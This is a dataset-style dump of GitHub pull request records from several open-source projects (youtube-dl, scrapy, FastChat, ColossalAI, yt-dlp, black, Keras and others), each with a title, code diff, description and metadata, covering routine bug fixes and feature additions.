| This problem happens when running with a fresh DB setup, the returned tree is empty. | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/1838 | 2023-02-24T13:12:44Z | 2023-02-24T13:19:47Z | 2023-02-24T13:19:47Z | 2023-02-24T13:19:48Z | 158 | LAION-AI/Open-Assistant | 37,058 |
[vimeo] Ignore video 'base' thumbnail (Closes #3438) | diff --git a/youtube_dl/extractor/vimeo.py b/youtube_dl/extractor/vimeo.py
index 10844f39e68..11c7d7e817f 100644
--- a/youtube_dl/extractor/vimeo.py
+++ b/youtube_dl/extractor/vimeo.py
@@ -276,7 +276,7 @@ def _real_extract(self, url):
if video_thumbnail is None:
video_thumbs = config["video"].get("thumbs")
if video_thumbs and isinstance(video_thumbs, dict):
- _, video_thumbnail = sorted((int(width), t_url) for (width, t_url) in video_thumbs.items())[-1]
+ _, video_thumbnail = sorted((int(width if width.isdigit() else 0), t_url) for (width, t_url) in video_thumbs.items())[-1]
# Extract video description
video_description = None
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/3441 | 2014-08-04T19:37:53Z | 2014-08-05T12:07:05Z | 2014-08-05T12:07:05Z | 2014-08-05T13:06:37Z | 201 | ytdl-org/youtube-dl | 49,876 |
|
Remove unnecessary comma | diff --git a/scrapy/resolver.py b/scrapy/resolver.py
index 554a3a14dba..f69894b1e4e 100644
--- a/scrapy/resolver.py
+++ b/scrapy/resolver.py
@@ -29,7 +29,7 @@ def from_crawler(cls, crawler, reactor):
cache_size = 0
return cls(reactor, cache_size, crawler.settings.getfloat('DNS_TIMEOUT'))
- def install_on_reactor(self,):
+ def install_on_reactor(self):
self.reactor.installResolver(self)
def getHostByName(self, name, timeout=None):
| https://api.github.com/repos/scrapy/scrapy/pulls/4369 | 2020-02-23T21:30:10Z | 2020-02-24T11:02:01Z | 2020-02-24T11:02:01Z | 2020-02-26T12:34:29Z | 140 | scrapy/scrapy | 34,967 |
|
Add AWQ 4bit inference support | diff --git a/docs/awq.md b/docs/awq.md
new file mode 100644
index 0000000000..ac38ef3dd5
--- /dev/null
+++ b/docs/awq.md
@@ -0,0 +1,71 @@
+# AWQ 4bit Inference
+
+We integrated [AWQ](https://github.com/mit-han-lab/llm-awq) into FastChat to provide **efficient and accurate** 4bit LLM inference.
+
+## Install AWQ
+
+Setup environment (please refer to [this link](https://github.com/mit-han-lab/llm-awq#install) for more details):
+```bash
+conda create -n fastchat-awq python=3.10 -y
+conda activate fastchat-awq
+# cd /path/to/FastChat
+pip install --upgrade pip # enable PEP 660 support
+pip install -e . # install fastchat
+
+git clone https://github.com/mit-han-lab/llm-awq repositories/llm-awq
+cd repositories/llm-awq
+pip install -e . # install awq package
+
+cd awq/kernels
+python setup.py install # install awq CUDA kernels
+```
+
+## Chat with the CLI
+
+```bash
+# Download quantized model from huggingface
+# Make sure you have git-lfs installed (https://git-lfs.com)
+git lfs install
+git clone https://huggingface.co/mit-han-lab/vicuna-7b-v1.3-4bit-g128-awq
+
+# You can specify which quantized model to use by setting --awq-ckpt
+python3 -m fastchat.serve.cli \
+ --model-path models/vicuna-7b-v1.3-4bit-g128-awq \
+ --awq-wbits 4 \
+ --awq-groupsize 128
+```
+
+## Benchmark
+
+* Through **4-bit weight quantization**, AWQ helps to run larger language models within the device memory restriction and prominently accelerates token generation. All benchmarks are done with group_size 128.
+
+* Benchmark on NVIDIA RTX A6000:
+
+ | Model | Bits | Max Memory (MiB) | Speed (ms/token) | AWQ Speedup |
+ | --------------- | ---- | ---------------- | ---------------- | ----------- |
+ | vicuna-7b | 16 | 13543 | 26.06 | / |
+ | vicuna-7b | 4 | 5547 | 12.43 | 2.1x |
+ | llama2-7b-chat | 16 | 13543 | 27.14 | / |
+ | llama2-7b-chat | 4 | 5547 | 12.44 | 2.2x |
+ | vicuna-13b | 16 | 25647 | 44.91 | / |
+ | vicuna-13b | 4 | 9355 | 17.30 | 2.6x |
+ | llama2-13b-chat | 16 | 25647 | 47.28 | / |
+ | llama2-13b-chat | 4 | 9355 | 20.28 | 2.3x |
+
+* NVIDIA RTX 4090:
+
+ | Model | AWQ 4bit Speed (ms/token) | FP16 Speed (ms/token) | AWQ Speedup |
+ | --------------- | ------------------------- | --------------------- | ----------- |
+ | vicuna-7b | 8.61 | 19.09 | 2.2x |
+ | llama2-7b-chat | 8.66 | 19.97 | 2.3x |
+ | vicuna-13b | 12.17 | OOM | / |
+ | llama2-13b-chat | 13.54 | OOM | / |
+
+* NVIDIA Jetson Orin:
+
+ | Model | AWQ 4bit Speed (ms/token) | FP16 Speed (ms/token) | AWQ Speedup |
+ | --------------- | ------------------------- | --------------------- | ----------- |
+ | vicuna-7b | 65.34 | 93.12 | 1.4x |
+ | llama2-7b-chat | 75.11 | 104.71 | 1.4x |
+ | vicuna-13b | 115.40 | OOM | / |
+ | llama2-13b-chat | 136.81 | OOM | / |
diff --git a/fastchat/model/model_adapter.py b/fastchat/model/model_adapter.py
index 897a0b8aa2..b465ce68c5 100644
--- a/fastchat/model/model_adapter.py
+++ b/fastchat/model/model_adapter.py
@@ -26,6 +26,7 @@
)
from fastchat.modules.gptq import GptqConfig, load_gptq_quantized
+from fastchat.modules.awq import AWQConfig, load_awq_quantized
from fastchat.conversation import Conversation, get_conv_template
from fastchat.model.compression import load_compress_model
from fastchat.model.model_chatglm import generate_stream_chatglm
@@ -150,11 +151,11 @@ def load_model(
load_8bit: bool = False,
cpu_offloading: bool = False,
gptq_config: Optional[GptqConfig] = None,
+ awq_config: Optional[AWQConfig] = None,
revision: str = "main",
debug: bool = False,
):
"""Load a model from Hugging Face."""
-
# get model adapter
adapter = get_model_adapter(model_path)
@@ -219,6 +220,29 @@ def load_model(
torch_dtype=kwargs["torch_dtype"],
revision=revision,
)
+ elif awq_config and awq_config.wbits < 16:
+ assert (
+ awq_config.wbits == 4
+ ), "Currently we only support 4-bit inference for AWQ."
+ model, tokenizer = load_awq_quantized(model_path, awq_config, device)
+ if num_gpus != 1:
+ device_map = accelerate.infer_auto_device_map(
+ model,
+ max_memory=kwargs["max_memory"],
+ no_split_module_classes=[
+ "OPTDecoderLayer",
+ "LlamaDecoderLayer",
+ "BloomBlock",
+ "MPTBlock",
+ "DecoderLayer",
+ ],
+ )
+ model = accelerate.dispatch_model(
+ model, device_map=device_map, offload_buffers=True
+ )
+ else:
+ model.to(device)
+ return model, tokenizer
elif gptq_config and gptq_config.wbits < 16:
model, tokenizer = load_gptq_quantized(model_path, gptq_config)
if num_gpus != 1:
@@ -370,6 +394,25 @@ def add_model_args(parser):
action="store_true",
help="Whether to apply the activation order GPTQ heuristic",
)
+ parser.add_argument(
+ "--awq-ckpt",
+ type=str,
+ default=None,
+ help="Load quantized model. The path to the local AWQ checkpoint.",
+ )
+ parser.add_argument(
+ "--awq-wbits",
+ type=int,
+ default=16,
+ choices=[4, 16],
+ help="#bits to use for AWQ quantization",
+ )
+ parser.add_argument(
+ "--awq-groupsize",
+ type=int,
+ default=-1,
+ help="Groupsize to use for AWQ quantization; default uses full row.",
+ )
def remove_parent_directory_name(model_path):
diff --git a/fastchat/modules/awq.py b/fastchat/modules/awq.py
new file mode 100644
index 0000000000..1f27be85c0
--- /dev/null
+++ b/fastchat/modules/awq.py
@@ -0,0 +1,85 @@
+from dataclasses import dataclass, field
+from pathlib import Path
+import sys
+
+import torch
+from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, modeling_utils
+
+
+@dataclass
+class AWQConfig:
+ ckpt: str = field(
+ default=None,
+ metadata={
+ "help": "Load quantized model. The path to the local AWQ checkpoint."
+ },
+ )
+ wbits: int = field(default=16, metadata={"help": "#bits to use for quantization"})
+ groupsize: int = field(
+ default=-1,
+ metadata={"help": "Groupsize to use for quantization; default uses full row."},
+ )
+
+
+def load_awq_quantized(model_name, awq_config: AWQConfig, device):
+ print("Loading AWQ quantized model...")
+
+ try:
+ from tinychat.utils import load_quant
+ from tinychat.modules import make_quant_norm, make_quant_attn, make_fused_mlp
+ except ImportError as e:
+ print(f"Error: Failed to import tinychat. {e}")
+ print("Please double check if you have successfully installed AWQ")
+ print("See https://github.com/lm-sys/FastChat/blob/main/docs/awq.md")
+ sys.exit(-1)
+
+ config = AutoConfig.from_pretrained(model_name, trust_remote_code=True)
+ tokenizer = AutoTokenizer.from_pretrained(
+ model_name, use_fast=False, trust_remote_code=True
+ )
+
+ def skip(*args, **kwargs):
+ pass
+
+ torch.nn.init.kaiming_uniform_ = skip
+ torch.nn.init.kaiming_normal_ = skip
+ torch.nn.init.uniform_ = skip
+ torch.nn.init.normal_ = skip
+ modeling_utils._init_weights = False
+
+ torch.set_default_dtype(torch.half)
+ model = AutoModelForCausalLM.from_config(config, trust_remote_code=True)
+
+ if any(name in find_awq_ckpt(awq_config) for name in ["llama", "vicuna"]):
+ model = load_quant.load_awq_llama_fast(
+ model,
+ find_awq_ckpt(awq_config),
+ awq_config.wbits,
+ awq_config.groupsize,
+ device,
+ )
+ make_quant_attn(model, device)
+ make_quant_norm(model)
+ make_fused_mlp(model)
+ else:
+ model = load_quant.load_awq_model(
+ model,
+ find_awq_ckpt(awq_config),
+ awq_config.wbits,
+ awq_config.groupsize,
+ device,
+ )
+ return model, tokenizer
+
+
+def find_awq_ckpt(awq_config: AWQConfig):
+ if Path(awq_config.ckpt).is_file():
+ return awq_config.ckpt
+
+ for ext in ["*.pt", "*.safetensors"]:
+ matched_result = sorted(Path(awq_config.ckpt).glob(ext))
+ if len(matched_result) > 0:
+ return str(matched_result[-1])
+
+ print("Error: AWQ checkpoint not found")
+ sys.exit(1)
diff --git a/fastchat/serve/cli.py b/fastchat/serve/cli.py
index 67735b0d67..12b6146a40 100644
--- a/fastchat/serve/cli.py
+++ b/fastchat/serve/cli.py
@@ -25,6 +25,7 @@
from fastchat.model.model_adapter import add_model_args
from fastchat.modules.gptq import GptqConfig
+from fastchat.modules.awq import AWQConfig
from fastchat.serve.inference import ChatIO, chat_loop
@@ -206,6 +207,11 @@ def main(args):
groupsize=args.gptq_groupsize,
act_order=args.gptq_act_order,
),
+ AWQConfig(
+ ckpt=args.awq_ckpt or args.model_path,
+ wbits=args.awq_wbits,
+ groupsize=args.awq_groupsize,
+ ),
args.revision,
args.judge_sent_end,
args.debug,
diff --git a/fastchat/serve/inference.py b/fastchat/serve/inference.py
index ee8387bd3e..26feff2235 100644
--- a/fastchat/serve/inference.py
+++ b/fastchat/serve/inference.py
@@ -34,6 +34,7 @@
get_generate_stream_function,
)
from fastchat.modules.gptq import GptqConfig
+from fastchat.modules.awq import AWQConfig
from fastchat.utils import is_partial_stop, is_sentence_complete, get_context_length
@@ -284,6 +285,7 @@ def chat_loop(
max_new_tokens: int,
chatio: ChatIO,
gptq_config: GptqConfig,
+ awq_config: AWQConfig,
revision: str,
judge_sent_end: bool,
debug: bool,
@@ -298,6 +300,7 @@ def chat_loop(
load_8bit,
cpu_offloading,
gptq_config,
+ awq_config,
revision,
debug,
)
| <!-- Thank you for your contribution! -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
<!-- Please give a short summary of the change and the problem this solves. -->
In this PR we introduce [AWQ](https://github.com/mit-han-lab/llm-awq) 4bit inference to FastChat. AWQ supports efficient and accurate low-bit weight quantization for LLMs, and helps to run larger language models within the device memory restriction and prominently accelerates token generation. For example, when running LLaMA-2-7b, AWQ delivers 2.3x and 1.4x speedups over the FP16 baseline on RTX 4090 and Jetson Orin, respectively.
## Checks
- [x] I've run `format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed.
- [x] I've made sure the relevant tests are passing (if applicable).
| https://api.github.com/repos/lm-sys/FastChat/pulls/2103 | 2023-07-28T03:37:40Z | 2023-08-01T10:09:19Z | 2023-08-01T10:09:19Z | 2023-08-01T10:09:19Z | 3,058 | lm-sys/FastChat | 41,113 |
[Fix] Fix compile error | diff --git a/op_builder/utils.py b/op_builder/utils.py
index cb528eea66a1..9412c725baab 100644
--- a/op_builder/utils.py
+++ b/op_builder/utils.py
@@ -197,11 +197,12 @@ def get_cuda_cc_flag() -> List[str]:
import torch
cc_flag = []
+ max_arch = ''.join(str(i) for i in torch.cuda.get_device_capability())
for arch in torch.cuda.get_arch_list():
res = re.search(r'sm_(\d+)', arch)
if res:
arch_cap = res[1]
- if int(arch_cap) >= 60:
+ if int(arch_cap) >= 60 and int(arch_cap) <= int(max_arch):
cc_flag.extend(['-gencode', f'arch=compute_{arch_cap},code={arch}'])
return cc_flag
| ## 📌 Checklist before creating the PR
- [x] I have created an issue for this PR for traceability
- [ ] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description`
- [ ] I have added relevant tags if possible for us to better distinguish different PRs
## 🚨 Issue number
> Link this PR to your issue with words like fixed to automatically close the linked issue upon merge
>
> e.g. `fixed #1234`, `closed #1234`, `resolved #1234`
## 📝 What does this PR do?
`torch.cuda.get_arch_list()` here:
https://github.com/hpcaitech/ColossalAI/blob/5187c96b7c04ac6c794a58044533c874fa24e206/op_builder/utils.py#L200
will get the available GPU arch for the current PyTorch lib. For example, the PyTorch 2.0 is built by the hopper arch GPU, it will return a list:
`['sm_37', 'sm_50', 'sm_60', 'sm_70', 'sm_75', 'sm_80', 'sm_86', 'sm_90']`
However, my GPU is an ampere arch GPU, return a list includes `sm_90` here will cause an compile error like:
nvcc fatal : Unsupported gpu architecture 'compute_90'.
Therefore, I think the valid arch returned here should be >= `sm60` but <= `sm86`, which is the max available arch for my GPU
## 💥 Checklist before requesting a review
- [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue))
- [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible
- [ ] I have performed a self-review of my code
- [ ] I have added thorough tests.
- [ ] I have added docstrings for all the functions/methods I implemented
## ⭐️ Do you enjoy contributing to Colossal-AI?
- [ ] 🌝 Yes, I do.
- [ ] 🌚 No, I don't.
Tell us more if you don't enjoy contributing to Colossal-AI.
| https://api.github.com/repos/hpcaitech/ColossalAI/pulls/4357 | 2023-07-31T13:02:10Z | 2023-09-01T10:12:58Z | 2023-09-01T10:12:58Z | 2023-09-01T10:12:58Z | 194 | hpcaitech/ColossalAI | 11,741 |
Add ParamountPlusSeriesIE. | diff --git a/yt_dlp/extractor/cbs.py b/yt_dlp/extractor/cbs.py
index ac3057d596f..716e945197b 100644
--- a/yt_dlp/extractor/cbs.py
+++ b/yt_dlp/extractor/cbs.py
@@ -1,5 +1,6 @@
from __future__ import unicode_literals
+from .common import InfoExtractor
from .theplatform import ThePlatformFeedIE
from ..utils import (
ExtractorError,
@@ -122,3 +123,39 @@ def _extract_video_info(self, content_id, site='cbs', mpx_acc=2198311517):
def _real_extract(self, url):
content_id = self._match_id(url)
return self._extract_video_info(content_id)
+
+
+class ParamountPlusSeriesIE(InfoExtractor):
+ _VALID_URL = r'https?://(?:www\.)?paramountplus\.com/shows/(?P<id>[a-zA-Z0-9-_]+)/?(?:[#?]|$)'
+ _TESTS = [{
+ 'url': 'https://www.paramountplus.com/shows/drake-josh',
+ 'playlist_mincount': 50,
+ 'info_dict': {
+ 'id': 'drake-josh',
+ }
+ }, {
+ 'url': 'https://www.paramountplus.com/shows/hawaii_five_0/',
+ 'playlist_mincount': 240,
+ 'info_dict': {
+ 'id': 'hawaii_five_0',
+ }
+ }, {
+ 'url': 'https://www.paramountplus.com/shows/spongebob-squarepants/',
+ 'playlist_mincount': 248,
+ 'info_dict': {
+ 'id': 'spongebob-squarepants',
+ }
+ }]
+ _API_URL = 'https://www.paramountplus.com/shows/{}/xhr/episodes/page/0/size/100000/xs/0/season/0/'
+
+ def _entries(self, show_name):
+ show_json = self._download_json(self._API_URL.format(show_name), video_id=show_name)
+ if show_json.get('success'):
+ for episode in show_json['result']['data']:
+ yield self.url_result(
+ 'https://www.paramountplus.com%s' % episode['url'],
+ ie=CBSIE.ie_key(), video_id=episode['content_id'])
+
+ def _real_extract(self, url):
+ show_name = self._match_id(url)
+ return self.playlist_result(self._entries(show_name), playlist_id=show_name)
diff --git a/yt_dlp/extractor/extractors.py b/yt_dlp/extractor/extractors.py
index c0c613e14e9..e1212107352 100644
--- a/yt_dlp/extractor/extractors.py
+++ b/yt_dlp/extractor/extractors.py
@@ -202,7 +202,10 @@
CBCWatchIE,
CBCOlympicsIE,
)
-from .cbs import CBSIE
+from .cbs import (
+ CBSIE,
+ ParamountPlusSeriesIE,
+)
from .cbslocal import (
CBSLocalIE,
CBSLocalArticleIE,
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [adding new extractor tutorial](https://github.com/ytdl-org/youtube-dl#adding-support-for-a-new-site) and [youtube-dl coding conventions](https://github.com/ytdl-org/youtube-dl#youtube-dl-coding-conventions) sections
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into youtube-dl each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [ ] Improvement
- [x] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Closes https://github.com/yt-dlp/yt-dlp/issues/602
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/603 | 2021-08-01T10:09:58Z | 2021-08-01T21:28:48Z | 2021-08-01T21:28:48Z | 2021-08-06T14:36:41Z | 727 | yt-dlp/yt-dlp | 7,639 |
Set correct return statement for `is_type_comment` function | diff --git a/black.py b/black.py
index 65545e9f21d..d1e87a9fa98 100644
--- a/black.py
+++ b/black.py
@@ -2777,7 +2777,7 @@ def is_type_comment(leaf: Leaf, suffix: str = "") -> bool:
Only returns true for type comments for now."""
t = leaf.type
v = leaf.value
- return t in {token.COMMENT, t == STANDALONE_COMMENT} and v.startswith(
+ return t in {token.COMMENT, STANDALONE_COMMENT} and v.startswith(
"# type:" + suffix
)
| Looks like there are mistake in `is_type_comment` function.
When function return statement was updated from:
```python
return bool(
(t == token.COMMENT or t == STANDALONE_COMMENT) and (v.startswith("# type:"))
)
```
to
```python
return t in {token.COMMENT, t == STANDALONE_COMMENT} and v.startswith("# type:")
```
In set there are comparison:
```python
{token.COMMENT, t == STANDALONE_COMMENT}
```
I think set should be :
```python
{token.COMMENT, STANDALONE_COMMENT}
```
Correct me in case if this isn't bug.
Thanks | https://api.github.com/repos/psf/black/pulls/929 | 2019-07-18T12:35:14Z | 2019-10-20T14:52:08Z | 2019-10-20T14:52:08Z | 2019-10-20T14:52:08Z | 146 | psf/black | 23,703 |
Add ONNX-Scala and NDScala to Scala list | diff --git a/README.md b/README.md
index 8011fe1d..e664edb3 100644
--- a/README.md
+++ b/README.md
@@ -1558,6 +1558,7 @@ be
<a name="scala-data-analysis--data-visualization"></a>
#### Data Analysis / Data Visualization
+* [NDScala](https://github.com/SciScala/NDScala) - N-dimensional arrays in Scala 3. Think NumPy ndarray, but with compile-time type-checking/inference over shapes, tensor/axis labels & numeric data types
* [MLlib in Apache Spark](https://spark.apache.org/docs/latest/mllib-guide.html) - Distributed machine learning library in Spark
* [Hydrosphere Mist](https://github.com/Hydrospheredata/mist) - a service for deployment Apache Spark MLLib machine learning models as realtime, batch or reactive web services.
* [Scalding](https://github.com/twitter/scalding) - A Scala API for Cascading.
@@ -1572,6 +1573,7 @@ be
<a name="scala-general-purpose-machine-learning"></a>
#### General-Purpose Machine Learning
+* [ONNX-Scala](https://github.com/EmergentOrder/onnx-scala) - An ONNX (Open Neural Network eXchange) API and backend for typeful, functional deep learning in Scala (3).
* [DeepLearning.scala](https://deeplearning.thoughtworks.school/) - Creating statically typed dynamic neural networks from object-oriented & functional programming constructs.
* [Conjecture](https://github.com/etsy/Conjecture) - Scalable Machine Learning in Scalding.
* [brushfire](https://github.com/stripe/brushfire) - Distributed decision tree ensemble learning in Scala.
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/792 | 2021-04-15T12:07:07Z | 2021-04-15T14:25:31Z | 2021-04-15T14:25:31Z | 2021-04-15T14:25:31Z | 385 | josephmisiti/awesome-machine-learning | 52,370 |
|
Revert use of celery task for Discord notifications | diff --git a/backend/oasst_backend/prompt_repository.py b/backend/oasst_backend/prompt_repository.py
index 1ce0cab569..d5f1a477aa 100644
--- a/backend/oasst_backend/prompt_repository.py
+++ b/backend/oasst_backend/prompt_repository.py
@@ -30,8 +30,8 @@
from oasst_backend.models.payload_column_type import PayloadContainer
from oasst_backend.task_repository import TaskRepository, validate_frontend_message_id
from oasst_backend.user_repository import UserRepository
+from oasst_backend.utils import discord
from oasst_backend.utils.database_utils import CommitMode, db_lang_to_postgres_ts_lang, managed_tx_method
-from oasst_backend.utils.discord import send_new_report_message
from oasst_shared.exceptions import OasstError, OasstErrorCode
from oasst_shared.schemas import protocol as protocol_schema
from oasst_shared.schemas.protocol import SystemStats
@@ -595,7 +595,7 @@ def store_text_labels(self, text_labels: protocol_schema.TextLabels) -> tuple[Te
message_id, protocol_schema.EmojiOp.add, protocol_schema.EmojiCode.red_flag
)
- send_new_report_message.delay(message=message, label_text=text_labels.text, user_id=self.user_id)
+ discord.send_new_report_message(message=message, label_text=text_labels.text, user_id=self.user_id)
# update existing record for repeated updates (same user no task associated)
existing_text_label = self.fetch_non_task_text_labels(message_id, self.user_id)
diff --git a/backend/oasst_backend/utils/discord.py b/backend/oasst_backend/utils/discord.py
index 464ff6ae7a..3f8f5f62b6 100644
--- a/backend/oasst_backend/utils/discord.py
+++ b/backend/oasst_backend/utils/discord.py
@@ -2,18 +2,15 @@
import requests
from loguru import logger
-from oasst_backend.celery_worker import app as celery_app
from oasst_backend.config import settings
from oasst_backend.models.message import Message
ROOT_ENDPOINT = "https://discord.com/api/v10"
-@celery_app.task(name="send_new_report_message")
def send_new_report_message(message: Message, label_text: str, user_id: UUID):
"""
Send a message to the Discord channel when a new message is flagged.
- Note: this is a Celery task.
Args:
message (Message): the flagged message
diff --git a/backend/update_message_attributes.py b/backend/update_message_attributes.py
index 0290e029d1..8e09c92ab3 100644
--- a/backend/update_message_attributes.py
+++ b/backend/update_message_attributes.py
@@ -2,7 +2,7 @@
from loguru import logger
from oasst_backend.models import ApiClient, Message
-from oasst_backend.scheduled_tasks import check_toxicity, hf_feature_extraction
+from oasst_backend.scheduled_tasks import hf_feature_extraction, toxicity
from oasst_backend.utils.database_utils import default_session_factory
from sqlmodel import text
@@ -71,7 +71,7 @@ def find_and_update_toxicity(message_ids):
text = result.payload.payload.text
api_client = session.query(ApiClient).filter(ApiClient.id == api_client_id).first()
if api_client is not None and text is not None:
- check_toxicity(text=text, message_id=message_id, api_client=api_client.__dict__)
+ toxicity(text=text, message_id=message_id, api_client=api_client.__dict__)
# to not get rate limited from HF
time.sleep(10)
except Exception as e:
| Should fix #3504 | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3516 | 2023-06-25T10:15:28Z | 2023-06-25T13:12:04Z | 2023-06-25T13:12:04Z | 2023-06-25T13:12:05Z | 804 | LAION-AI/Open-Assistant | 36,851 |
Add map, foldl, foldr to the backend | diff --git a/keras/backend/tensorflow_backend.py b/keras/backend/tensorflow_backend.py
index 03dd2e552af..2abaf50769f 100644
--- a/keras/backend/tensorflow_backend.py
+++ b/keras/backend/tensorflow_backend.py
@@ -1974,3 +1974,52 @@ def ctc_decode(y_pred, input_length, greedy=True, beam_width=100,
for st in decoded]
return (decoded_dense, log_prob)
+
+
+# HIGH ORDER FUNCTIONS
+
+def map_fn(fn, elems, name=None):
+ '''Map the function fn over the elements elems and return the outputs.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems
+ elems: tensor
+ name: A string name for the map node in the graph
+
+ # Returns
+ Tensor with first dimension equal to the elems and second depending on
+ fn
+ '''
+ return tf.map_fn(fn, elems, name=name)
+
+
+def foldl(fn, elems, initializer=None, name=None):
+ '''Reduce elems using fn to combine them from left to right.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems and an
+ accumulator, for instance lambda acc, x: acc + x
+ elems: tensor
+ initializer: The first value used (elems[0] in case of None)
+ name: A string name for the foldl node in the graph
+
+ # Returns
+ Same type and shape as initializer
+ '''
+ return tf.foldl(fn, elems, initializer=initializer, name=name)
+
+
+def foldr(fn, elems, initializer=None, name=None):
+ '''Reduce elems using fn to combine them from right to left.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems and an
+ accumulator, for instance lambda acc, x: acc + x
+ elems: tensor
+ initializer: The first value used (elems[-1] in case of None)
+ name: A string name for the foldr node in the graph
+
+ # Returns
+ Same type and shape as initializer
+ '''
+ return tf.foldr(fn, elems, initializer=initializer, name=name)
diff --git a/keras/backend/theano_backend.py b/keras/backend/theano_backend.py
index 2cd3c7a4bde..33388fd22a2 100644
--- a/keras/backend/theano_backend.py
+++ b/keras/backend/theano_backend.py
@@ -1851,3 +1851,68 @@ def ctc_step(y_true_step, y_pred_step, input_length_step, label_length_step):
ret = ret.dimshuffle('x', 0)
return ret
+
+
+# HIGH ORDER FUNCTIONS
+
+def map_fn(fn, elems, name=None):
+ '''Map the function fn over the elements elems and return the outputs.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems
+ elems: tensor, at least 2 dimensional
+ name: A string name for the map node in the graph
+
+ # Returns
+ Tensor with first dimension equal to the elems and second depending on
+ fn
+ '''
+ return theano.map(fn, elems, name=name)[0]
+
+
+def foldl(fn, elems, initializer=None, name=None):
+ '''Reduce elems using fn to combine them from left to right.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems and an
+ accumulator, for instance lambda acc, x: acc + x
+ elems: tensor
+ initializer: The first value used (elems[0] in case of None)
+ name: A string name for the foldl node in the graph
+
+ # Returns
+ Same type and shape as initializer
+ '''
+ if initializer is None:
+ initializer = elems[0]
+ elems = elems[1:]
+
+ # We need to change the order of the arguments because theano accepts x as
+ # first parameter and accumulator as second
+ fn2 = lambda x, acc: fn(acc, x)
+
+ return theano.foldl(fn2, elems, initializer, name=name)[0]
+
+
+def foldr(fn, elems, initializer=None, name=None):
+ '''Reduce elems using fn to combine them from right to left.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems and an
+ accumulator, for instance lambda acc, x: acc + x
+ elems: tensor
+ initializer: The first value used (elems[-1] in case of None)
+ name: A string name for the foldr node in the graph
+
+ # Returns
+ Same type and shape as initializer
+ '''
+ if initializer is None:
+ initializer = elems[-1]
+ elems = elems[:-1]
+
+ # We need to change the order of the arguments because theano accepts x as
+ # first parameter and accumulator as second
+ fn2 = lambda x, acc: fn(acc, x)
+
+ return theano.foldr(fn2, elems, initializer, name=name)[0]
diff --git a/tests/keras/backend/test_backends.py b/tests/keras/backend/test_backends.py
index cc9bf422f0c..35a76a7e59c 100644
--- a/tests/keras/backend/test_backends.py
+++ b/tests/keras/backend/test_backends.py
@@ -881,6 +881,35 @@ def test_sparse_concat(self):
assert k_s_d.shape == k_d.shape
assert_allclose(k_s_d, k_d, atol=1e-05)
+ def test_map(self):
+ x = np.random.rand(10, 3).astype(np.float32)
+ for K in [KTF, KTH]:
+ kx = K.eval(K.map_fn(K.sum, x))
+
+ assert (10,) == kx.shape
+ assert_allclose(x.sum(axis=1), kx, atol=1e-05)
+
+ def test_foldl(self):
+ x = np.random.rand(10, 3).astype(np.float32)
+ for K in [KTF, KTH]:
+ kx = K.eval(K.foldl(lambda a, b: a+b, x))
+
+ assert (3,) == kx.shape
+ assert_allclose(x.sum(axis=0), kx, atol=1e-05)
+
+ def test_foldr(self):
+ # This test aims to make sure that we walk the array from right to left
+ # and checks it in the following way: multiplying left to right 1e-40
+ # cannot be held into a float32 so it causes an underflow while from
+ # right to left we have no such problem and the result is larger
+ x = np.array([1e-20, 1e-20, 10, 10, 10], dtype=np.float32)
+ for K in [KTF, KTH]:
+ p1 = K.eval(K.foldl(lambda a, b: a*b, x))
+ p2 = K.eval(K.foldr(lambda a, b: a*b, x))
+
+ assert p1 < p2
+ assert 9e-38 < p2 <= 1e-37
+
if __name__ == '__main__':
pytest.main([__file__])
| Hi, this is in reference to #4434 .
Tell me if it needs anything more. I believe K.rnn is really unintuitive to use for simple maps and folds if it can even be used. | https://api.github.com/repos/keras-team/keras/pulls/4461 | 2016-11-21T21:28:38Z | 2016-11-23T21:21:13Z | 2016-11-23T21:21:13Z | 2016-11-29T18:23:50Z | 1,693 | keras-team/keras | 47,762 |
modified the proxy.py. | diff --git a/proxy.py b/proxy.py
index 4c5b4cc0..a60b1f53 100644
--- a/proxy.py
+++ b/proxy.py
@@ -5,7 +5,6 @@
class SalesManager:
-
def work(self):
print("Sales Manager working...")
@@ -14,7 +13,6 @@ def talk(self):
class Proxy:
-
def __init__(self):
self.busy = 'No'
self.sales = None
@@ -30,14 +28,32 @@ def work(self):
print("Sales Manager is busy")
+class NoTalkProxy(Proxy):
+ def __init__(self):
+ Proxy.__init__(self)
+
+ def work(self):
+ print("Proxy checking for Sales Manager availability")
+ time.sleep(2)
+ print("This Sales Manager will not talk to you whether he/she is busy or not")
+
+
if __name__ == '__main__':
p = Proxy()
p.work()
p.busy = 'Yes'
p.work()
+ p = NoTalkProxy()
+ p.work()
+ p.busy = 'Yes'
+ p.work()
### OUTPUT ###
# Proxy checking for Sales Manager availability
# Sales Manager ready to talk
# Proxy checking for Sales Manager availability
# Sales Manager is busy
